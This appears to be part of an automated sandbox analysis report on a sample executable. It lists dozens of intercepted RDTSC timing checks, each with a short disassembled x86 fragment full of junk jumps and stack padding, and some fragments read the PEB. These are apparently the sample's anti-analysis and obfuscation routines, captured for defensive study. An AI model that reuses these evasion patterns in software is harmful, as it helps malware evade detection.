Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 140FC0B second address: 140FC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF6D0B95BF2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 140FC26 second address: 140FC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 140FD73 second address: 140FDA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jns 00007FF6D0B95BEEh 0x0000000f jmp 00007FF6D0B95BF7h 0x00000014 push edi 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14100A6 second address: 14100AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14100AA second address: 14100CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF6D0B95BF8h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14100CC second address: 14100D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1410555 second address: 1410561 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF6D0B95BE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1410561 second address: 141056D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1412A7A second address: 1412A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14171A2 second address: 14171B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jc 00007FF6D0B64834h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14171B2 second address: 14171B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1416E6E second address: 1416E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1416E74 second address: 1416E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1416E7A second address: 1416E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1416E7F second address: 1416E91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEDh 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1416E91 second address: 1416E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1416E97 second address: 1416EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 jp 00007FF6D0B95BE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1416EA8 second address: 1416EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1416EB1 second address: 1416EBB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF6D0B95BE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1454A3D second address: 1454A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6D0B6481Fh 0x00000009 ja 00007FF6D0B64816h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14548C6 second address: 14548CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14548CC second address: 14548D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 144F8C3 second address: 144F8F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF5h 0x00000007 jo 00007FF6D0B95BE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FF6D0B95BF0h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1463886 second address: 1463894 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B6481Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14636CB second address: 14636DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FF6D0B95BE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14636DC second address: 1463715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6D0B6481Ch 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c je 00007FF6D0B64828h 0x00000012 je 00007FF6D0B64816h 0x00000018 jmp 00007FF6D0B6481Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f je 00007FF6D0B64816h 0x00000025 js 00007FF6D0B64816h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1463715 second address: 146372C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF6D0B95BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007FF6D0B95BE6h 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1467B2C second address: 1467B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1467C7C second address: 1467C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1467C83 second address: 1467CB1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF6D0B6481Eh 0x00000008 jmp 00007FF6D0B6481Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007FF6D0B64824h 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007FF6D0B64816h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 152CF88 second address: 152CF8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 152D225 second address: 152D22C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 152D22C second address: 152D299 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF6D0B95BF8h 0x00000008 jmp 00007FF6D0B95BF2h 0x0000000d jc 00007FF6D0B95C17h 0x00000013 jmp 00007FF6D0B95BF9h 0x00000018 jmp 00007FF6D0B95BF8h 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push ebx 0x00000022 jmp 00007FF6D0B95BF6h 0x00000027 pop ebx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 152D3FB second address: 152D3FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 152D3FF second address: 152D430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF6D0B95BF5h 0x0000000b push ecx 0x0000000c jmp 00007FF6D0B95BF1h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 152D430 second address: 152D434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 152D6FE second address: 152D728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6D0B95BEEh 0x00000009 popad 0x0000000a jnp 00007FF6D0B95BFBh 0x00000010 jmp 00007FF6D0B95BEFh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1532144 second address: 153216C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF6D0B64816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D23A9h], eax 0x00000011 push dword ptr [ebp+122D1BEAh] 0x00000017 sub edx, dword ptr [ebp+122D2915h] 0x0000001d push CF217A4Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 153216C second address: 153217D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 15337CC second address: 15337D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF6D0B64816h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00007 second address: 6F0000E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0000E second address: 6F00059 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF6D0B64828h 0x00000009 add al, 00000068h 0x0000000c jmp 00007FF6D0B6481Bh 0x00000011 popfd 0x00000012 mov bh, al 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d call 00007FF6D0B64823h 0x00000022 pop esi 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00059 second address: 6F000EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d call 00007FF6D0B95BEEh 0x00000012 mov cx, D2B1h 0x00000016 pop eax 0x00000017 pushfd 0x00000018 jmp 00007FF6D0B95BF7h 0x0000001d jmp 00007FF6D0B95BF3h 0x00000022 popfd 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 pushad 0x00000027 mov si, 140Bh 0x0000002b pushfd 0x0000002c jmp 00007FF6D0B95BF0h 0x00000031 or ah, 00000018h 0x00000034 jmp 00007FF6D0B95BEBh 0x00000039 popfd 0x0000003a popad 0x0000003b mov eax, dword ptr fs:[00000030h] 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F000EB second address: 6F000EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F000EF second address: 6F000F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F000F3 second address: 6F000F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F000F9 second address: 6F00138 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c jmp 00007FF6D0B95BF0h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FF6D0B95BF9h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00138 second address: 6F0013E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0013E second address: 6F00142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00142 second address: 6F00146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00146 second address: 6F0016C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF6D0B95BF6h 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0016C second address: 6F00170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00170 second address: 6F0018D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0018D second address: 6F001AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B64821h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ecx 0x00000011 mov ax, dx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F001AE second address: 6F001C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B95BF7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F001C9 second address: 6F001CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F001CD second address: 6F00224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007FF6D0B95BF2h 0x0000000e mov dword ptr [esp], esi 0x00000011 pushad 0x00000012 movzx ecx, di 0x00000015 movsx edx, si 0x00000018 popad 0x00000019 mov esi, dword ptr [775606ECh] 0x0000001f pushad 0x00000020 mov cx, 14E7h 0x00000024 pushfd 0x00000025 jmp 00007FF6D0B95BECh 0x0000002a and si, 9918h 0x0000002f jmp 00007FF6D0B95BEBh 0x00000034 popfd 0x00000035 popad 0x00000036 test esi, esi 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00224 second address: 6F002EA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF6D0B64820h 0x00000008 and al, 00000078h 0x0000000b jmp 00007FF6D0B6481Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 call 00007FF6D0B64826h 0x00000019 pop esi 0x0000001a pushfd 0x0000001b jmp 00007FF6D0B6481Bh 0x00000020 add ecx, 1DE6BFEEh 0x00000026 jmp 00007FF6D0B64829h 0x0000002b popfd 0x0000002c popad 0x0000002d popad 0x0000002e jne 00007FF6D0B65602h 0x00000034 jmp 00007FF6D0B6481Eh 0x00000039 xchg eax, edi 0x0000003a jmp 00007FF6D0B64820h 0x0000003f push eax 0x00000040 jmp 00007FF6D0B6481Bh 0x00000045 xchg eax, edi 0x00000046 jmp 00007FF6D0B64826h 0x0000004b call dword ptr [77530B60h] 0x00000051 mov eax, 756AE5E0h 0x00000056 ret 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FF6D0B6481Ah 0x00000060 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F002EA second address: 6F002F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F002F0 second address: 6F00368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF6D0B64823h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000044h 0x0000000d jmp 00007FF6D0B64826h 0x00000012 pop edi 0x00000013 jmp 00007FF6D0B64820h 0x00000018 xchg eax, edi 0x00000019 pushad 0x0000001a mov ecx, 1034E63Dh 0x0000001f mov edx, esi 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 mov bl, 2Ch 0x00000026 pushfd 0x00000027 jmp 00007FF6D0B6481Eh 0x0000002c adc cx, CB48h 0x00000031 jmp 00007FF6D0B6481Bh 0x00000036 popfd 0x00000037 popad 0x00000038 xchg eax, edi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00368 second address: 6F0036C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0036C second address: 6F00372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00372 second address: 6F0039D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 239E39AFh 0x00000008 mov ebx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF6D0B95BF8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0039D second address: 6F003A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F003A1 second address: 6F003A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F003A7 second address: 6F0040A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B6481Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f pushad 0x00000010 call 00007FF6D0B6481Eh 0x00000015 pushfd 0x00000016 jmp 00007FF6D0B64822h 0x0000001b and cx, F598h 0x00000020 jmp 00007FF6D0B6481Bh 0x00000025 popfd 0x00000026 pop ecx 0x00000027 popad 0x00000028 push dword ptr [eax+18h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FF6D0B64821h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0040A second address: 6F00410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00410 second address: 6F00414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F014AB second address: 6F014B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F014B0 second address: 6F014B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F014B6 second address: 6F014BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F014BA second address: 6F014CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F014CC second address: 6F014D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F014D0 second address: 6F014D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F014D4 second address: 6F014DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F014DA second address: 6F014DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F014DF second address: 6F01537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, dx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+34h] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF6D0B64825h 0x00000014 and esi, 4FF4CE96h 0x0000001a jmp 00007FF6D0B64821h 0x0000001f popfd 0x00000020 mov edi, eax 0x00000022 popad 0x00000023 mov dword ptr [edx+34h], eax 0x00000026 jmp 00007FF6D0B6481Ah 0x0000002b test ecx, 00000700h 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01537 second address: 6F0153B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0153B second address: 6F01541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01541 second address: 6F01578 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FF741173DA4h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF6D0B95BF7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01578 second address: 6F0157E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0157E second address: 6F015BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+38h], FFFFFFFFh 0x0000000f pushad 0x00000010 mov al, 72h 0x00000012 mov edi, 211E0954h 0x00000017 popad 0x00000018 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000001c jmp 00007FF6D0B95BF3h 0x00000021 or dword ptr [edx+40h], FFFFFFFFh 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov ecx, ebx 0x0000002a push ebx 0x0000002b pop eax 0x0000002c popad 0x0000002d rdtsc
